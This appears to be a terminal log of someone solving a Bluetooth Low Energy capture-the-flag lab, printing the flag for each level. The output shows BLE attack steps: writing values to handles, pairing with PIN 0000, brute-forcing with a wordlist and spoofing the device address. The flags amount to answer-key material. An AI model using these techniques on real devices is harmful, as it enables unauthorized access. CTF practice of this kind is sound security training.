root@PiBenchDash:/opt/BLE_CTF_V2# ./ Attached to peripheral Sending "12345678901234567890" to 0x2e Done root@PiBenchDash:/opt/BLE_CTF_V2# ./ Attached to peripheral Loading level 1 Reading value Flag: eca7d1f3cf60a8b5344a root@PiBenchDash:/opt/BLE_CTF_V2# ./ Attached to peripheral Loading level 02 Password Found: password1234 Flag: eca7d1f3cf60a8b5344a /*** * nano /etc/systemd/system/dbus-org.bluez.service * set: ExecStart=/usr/lib/bluetooth/bluetoothd --compat */ root@PiBenchDash:/opt/BLE_CTF_V2# systemctl daemon-reload root@PiBenchDash:/opt/BLE_CTF_V2# service bluetooth restart root@PiBenchDash:/opt/BLE_CTF_V2# ./ Attached to peripheral Loading level 03 Pairing Attached to peripheral (pid 0) Sending PIN: 0000 Flag: b46fa238cf820d0f60c1 Pairing successful root@PiBenchDash:/opt/BLE_CTF_V2# ./ Attached to peripheral Loading level 04 Generating wordlist Trying: AABBC8DDEEFF Flag: f401f21d02fdd0a4fc00 root@PiBenchDash:/opt/BLE_CTF_V2# ./ Attached to peripheral Loading level 05 Sending "121212121222" to 0x2c Reading value Flag: 84cf61c35b2d9c92217d root@PiBenchDash:/opt/BLE_CTF_V2# ./ Attached to peripheral Loading level 06 Manufacturer: Cypress Semiconductor Corporation (305) Device address: B8:27:EB:81:86:56 (Raspberry Pi Foundation) New BD address: 11:22:33:44:55:66 Address changed - Reset device now Reading value Flag: 1dec0e624f2ecf1513dc root@PiBenchDash:/opt/BLE_CTF_V2# ./ [bp] Attached to peripheral [++] Loading level 07 [sp] starting bluetoothctl [sp] Timeout [sp] Pairing successful [bp] Attached to peripheral [==] Flag: a16ee1a4001c66c3a670